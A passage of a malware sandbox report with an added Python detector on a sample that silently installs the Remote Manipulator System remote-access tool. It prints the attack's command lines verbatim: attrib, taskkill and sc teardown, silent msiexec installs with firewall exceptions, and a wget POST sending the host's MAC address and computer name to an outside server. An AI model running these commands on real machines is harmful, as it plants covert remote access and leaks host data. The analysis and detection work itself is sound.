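The decoded product code is {AB7AA605-500F-4153-8207-FB5563419112}, the same GUID that appears in the ProductIcon path above and that install.cmd later hands to MsiExec /x; the decoded upgrade code is {FE83B905-4554-4DFF-97F4-9292178CB171}, another of the GUIDs the script uninstalls. The registered Version decodes to 5.210.0, nothing like the "10.0.743894.2047" in the advertised name, and Language 1049 is the ru-RU LCID. Decoding the packed codes this way is how to tie an Installer\Products entry on a live host back to the uninstall GUIDs seen in process telemetry.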

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: SetClipboardViewer

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1628 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 1628 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 1628 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 1628 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 1628 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 1628 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 1628 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 808 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 808 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 808 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 808 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 808 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 808 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 808 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 580 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 580 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 580 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 580 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 580 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 580 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 580 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 892 wrote to memory of 1968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 892 wrote to memory of 1968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 892 wrote to memory of 1968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 892 wrote to memory of 1968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 892 wrote to memory of 1968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 892 wrote to memory of 1968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 892 wrote to memory of 1968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 892 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 892 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 892 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 892 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 892 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 892 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 892 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 892 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1272 wrote to memory of 1988 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe

"C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe"

C:\Users\Admin\AppData\Local\Temp\set.exe

"C:\Users\Admin\AppData\Local\Temp\set.exe" -p1234567890__

C:\Users\Admin\AppData\Local\Temp\setting.exe

"C:\Users\Admin\AppData\Local\Temp\setting.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\install.cmd" "

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Windows\system32\sysfiles"

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Windows\syswow64\sysfiles"

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Program Files (x86)\Remote Manipulator System - Server"

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Program Files (x86)\Remote Manipulator System - Server"

C:\Windows\SysWOW64\net.exe

net stop rmanservice

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop rmanservice

C:\Windows\SysWOW64\sc.exe

sc delete "rmanservice"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rfusclient.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rfusclient.exe *32"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe *32

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rutserv.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rutserv.exe *32"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe *32

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {A5DB67DC-DB0E-4491-B9F7-F258A02EE03C} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {5B1EC627-A9CA-4BE8-966E-5FCB90ECD770} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {54D1AB84-6B0B-445D-B7AB-E2B2FEEC3A4F} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {FE83B905-4554-4DFF-97F4-9292178CB171} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {AB7AA605-500F-4153-8207-FB5563419112} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{11A90858-40BB-4858-A2DA-CA6495B5E907}" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\85809A11BB0485842AADAC46595B9E70\InstallProperties" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKCR\Installer\Products\85809A11BB0485842AADAC46595B9E70" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SYSTEM\Remote Manipulator System" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AB7AA605-500F-4153-8207-FB5563419112}" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKCR\Installer\Products\506AA7BAF00535142870BF5536141921" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6EDC4423414699340B5D245426472701" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E45BAE6295648E74689FC47BF4E730EB" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E5052F47A02BDEA469F8EAB572D83BA8" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\System\CurrentControlSet\Services\RManService" /f

C:\Windows\SysWOW64\PING.EXE

ping -n 1 -w 500 google.com.ua

C:\Windows\SysWOW64\msiexec.exe

MsiExec /I "rms5.2.1.msi" /qn

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding B6C9F1DBAA2924468E0E6E332A1BFC22

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

"C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /silentinstall

C:\Windows\SysWOW64\sysfiles\rutserv.exe

"C:\Windows\SysWOW64\sysfiles\rutserv.exe" /silentinstall

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

"C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /firewall

C:\Windows\SysWOW64\sysfiles\rutserv.exe

"C:\Windows\SysWOW64\sysfiles\rutserv.exe" /firewall

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

"C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /start

C:\Windows\SysWOW64\sysfiles\rutserv.exe

"C:\Windows\SysWOW64\sysfiles\rutserv.exe" /start

C:\Windows\SysWOW64\sysfiles\rutserv.exe

C:\Windows\SysWOW64\sysfiles\rutserv.exe

C:\Windows\SysWOW64\PING.EXE

ping -n 10 127.0.0.1

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe /tray

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe /tray

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Reg Query "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"|Find /I "Options"

C:\Windows\SysWOW64\reg.exe

Reg Query "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"

C:\Windows\SysWOW64\find.exe

Find /I "Options"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c getmac|Find /I "Tcpip"

C:\Windows\SysWOW64\getmac.exe

getmac

C:\Windows\SysWOW64\find.exe

Find /I "Tcpip"

C:\Users\Admin\AppData\Local\Temp\wget.exe

wget --post-data="mac=6E-24-64-90-26-A6&comp=VQVVOAJK&id[…]group=download" "http://rms.admin-ru.ru/updater.php" -q -O -

C:\Windows\SysWOW64\PING.EXE

ping -n 3 127.0.0.1

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "

Network

Country Destination Domain Proto
US 8.8.8.8:53 google.com.ua udp
US 8.8.8.8:53 rmansys.ru udp
RU 31.31.198.18:80 rmansys.ru tcp
RU 31.31.198.18:80 rmansys.ru tcp
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp
US 8.8.8.8:53 rms.admin-ru.ru udp
NL 104.110.191.133:80 tcp
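
Read together, the Processes and Network sections describe one procedure: a password-protected SFX drops install.cmd, which unhides and tears down any earlier RMS install (attrib -S -H -r, net stop and sc delete rmanservice, taskkill of rfusclient.exe and rutserv.exe, MsiExec /x by product code, reg delete of the Remote Manipulator System and RManService keys), installs rms5.2.1.msi with /qn, registers rutserv.exe and rfusclient.exe with /silentinstall and /firewall, posts the host's MAC and computer name to rms.admin-ru.ru, and connects to rms-server.tektonit.ru:5655. The detector below is an added example, not part of the sandbox report or its signature set: it replays those command lines and network rows and labels the chain. Rule names, weights, the verdict logic and the shortened wget line are this example's assumptions.

```python
"""Added example, not part of the sandbox report: replay the command lines from the
Processes section and the rows from the Network section and decide whether they form
the unattended RMS (Remote Manipulator System) install chain. Rule names, weights,
the verdict logic and the trimmed wget line are this example's own assumptions."""
import re
from collections import defaultdict

# Constructed input: command lines copied from the Processes section above
# (the wget POST body is shortened to the fields visible in the report).
PROCESS_LOG = [
    r'"C:\Users\Admin\AppData\Local\Temp\set.exe" -p1234567890__',
    r'cmd /c ""C:\Users\Admin\AppData\Local\Temp\install.cmd" "',
    r'attrib -S -H -r "C:\Windows\system32\sysfiles"',
    r'attrib -S -H -r "C:\Program Files (x86)\Remote Manipulator System - Server"',
    r'net stop rmanservice',
    r'sc delete "rmanservice"',
    r'taskkill /f /im rfusclient.exe',
    r'taskkill /f /im rutserv.exe',
    r'MsiExec /x {AB7AA605-500F-4153-8207-FB5563419112} /qn REBOOT=ReallySuppress',
    r'reg delete "HKLM\SYSTEM\Remote Manipulator System" /f',
    r'reg delete "HKLM\System\CurrentControlSet\Services\RManService" /f',
    r'ping -n 1 -w 500 google.com.ua',
    r'MsiExec /I "rms5.2.1.msi" /qn',
    r'"C:\Windows\SysWOW64\sysfiles\rutserv.exe" /silentinstall',
    r'"C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /firewall',
    r'"C:\Windows\SysWOW64\sysfiles\rutserv.exe" /start',
    r'wget --post-data="mac=6E-24-64-90-26-A6&comp=VQVVOAJK&group=download" "http://rms.admin-ru.ru/updater.php" -q -O -',
]
# Constructed input: (proto, destination, port, domain) rows from the Network section.
NETWORK_LOG = [
    ("udp", "8.8.8.8", 53, "google.com.ua"),
    ("udp", "8.8.8.8", 53, "rmansys.ru"),
    ("tcp", "31.31.198.18", 80, "rmansys.ru"),
    ("tcp", "95.213.205.83", 5655, "rms-server.tektonit.ru"),
    ("udp", "8.8.8.8", 53, "rms.admin-ru.ru"),
    ("tcp", "104.110.191.133", 80, None),
]

# rule name -> (weight, pattern); weights and names are this example's assumptions.
PROCESS_RULES = {name: (w, re.compile(p, re.I)) for name, (w, p) in {
    "archive_password_on_cmdline": (1, r'\\set\.exe"?\s+-p\S+'),  # -p<value> on the dropped SFX stub, treated as an archive password (assumption)
    "unhide_previous_install":     (1, r'^attrib\s+(?:-[shr]\s+)+"?.*(?:\\sysfiles|remote manipulator system)'),
    "stop_rms_service":            (2, r'^net\s+stop\s+rmanservice|^sc\s+delete\s+"?rmanservice"?'),
    "kill_rms_processes":          (1, r'^taskkill\s+/f\s+/im\s+(?:rfusclient|rutserv)\.exe'),
    "uninstall_by_product_code":   (1, r'^msiexec\s+/x\s+\{[0-9a-f-]{36}\}\s+/qn'),
    "remove_rms_registry":         (1, r'^reg\s+delete\s+"hklm\\system\\(?:remote manipulator system|currentcontrolset\\services\\rmanservice)"'),
    "silent_msi_install_rms":      (3, r'^msiexec\s+/i\s+"?[^"]*rms[^"]*\.msi"?\s+/qn'),
    "rms_silentinstall":           (3, r'\\(?:rutserv|rfusclient)\.exe"?\s+(?:/server\s+)?/silentinstall'),
    "rms_firewall_exception":      (1, r'\\(?:rutserv|rfusclient)\.exe"?\s+(?:/server\s+)?/firewall'),
    "host_fingerprint_post":       (2, r'^wget\s+--post-data=.*mac=.*https?://'),
}.items()}
RMS_VENDOR_DOMAINS = re.compile(r'(^|\.)(rmansys\.ru|tektonit\.ru)$', re.I)  # domains from the Network table
NETWORK_WEIGHT = 2

def scan_processes(cmdlines):
    """Map rule name -> list of matching command lines (a rule counts once in the score)."""
    hits = defaultdict(list)
    for cl in cmdlines:
        for name, (_, rx) in PROCESS_RULES.items():
            if rx.search(cl):
                hits[name].append(cl)
    return dict(hits)

def scan_network(rows):
    """Flag traffic (DNS lookups included) to the RMS vendor domains."""
    hits = []
    for proto, dst, port, domain in rows:
        if domain and RMS_VENDOR_DOMAINS.search(domain):
            hits.append(f"{proto} {dst}:{port} {domain}")
    return {"rms_vendor_infrastructure": hits} if hits else {}

def verdict(proc_hits, net_hits):
    """An install signal plus a tamper signal is the unattended-install chain."""
    keys = set(proc_hits)
    score = sum(PROCESS_RULES[n][0] for n in keys) + (NETWORK_WEIGHT if net_hits else 0)
    install = {"silent_msi_install_rms", "rms_silentinstall"} & keys
    tamper = {"stop_rms_service", "kill_rms_processes",
              "uninstall_by_product_code", "remove_rms_registry"} & keys
    if install and tamper:
        label = "rms_unattended_install"
    elif install:
        label = "rms_silent_install"
    else:
        label = "no_rms_install"
    return {"label": label, "score": score, "signals": sorted(keys) + sorted(net_hits)}

if __name__ == "__main__":
    p, n = scan_processes(PROCESS_LOG), scan_network(NETWORK_LOG)
    v = verdict(p, n)
    print(v["label"], v["score"])
    for name in v["signals"]:
        for ev in (p.get(name) or n.get(name)):
            print(f"  {name}: {ev}")
```

Each rule scores once however many times it fires, so the repeated attrib and taskkill invocations do not inflate the result; what pushes the verdict to rms_unattended_install is the pairing of a silent install signal (MsiExec /I ... /qn or rutserv.exe /silentinstall) with the service teardown that the "Stops running service(s)" and "Kills process with taskkill" signatures above describe. The vendor-domain rule only says the host is talking to RMS infrastructure, which a legitimately deployed RMS server would also do, so it adds weight rather than deciding the label.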

Files

memory/1628-54-0x00000000751B1000-0x00000000751B3000-memory.dmp

\Users\Admin\AppData\Local\Temp\set.exe

MD5 d2d30a3f6adc1c7172e95346db406ac5
SHA1 60afc3240100c41190bea61d1a1269411c46a9a7
SHA256 27de2eaf228d84d632c39f38c679080083b27f65738f4d4340d7118aa304957d
SHA512 3e12526e268f7fa3f5ab05eb93ac54cc51b509a01f13ac71059107c4b5d04e37f3bf09f7dd62499f6f2506929e0876717c0fbba6f6b5e5ceb1e6cf7c0a5d2bc4

C:\Users\Admin\AppData\Local\Temp\set.exe

MD5 d2d30a3f6adc1c7172e95346db406ac5
SHA1 60afc3240100c41190bea61d1a1269411c46a9a7
SHA256 27de2eaf228d84d632c39f38c679080083b27f65738f4d4340d7118aa304957d
SHA512 3e12526e268f7fa3f5ab05eb93ac54cc51b509a01f13ac71059107c4b5d04e37f3bf09f7dd62499f6f2506929e0876717c0fbba6f6b5e5ceb1e6cf7c0a5d2bc4

\Users\Admin\AppData\Local\Temp\setting.exe

MD5 5913f76c2f3b690c5f258c99361a56a7
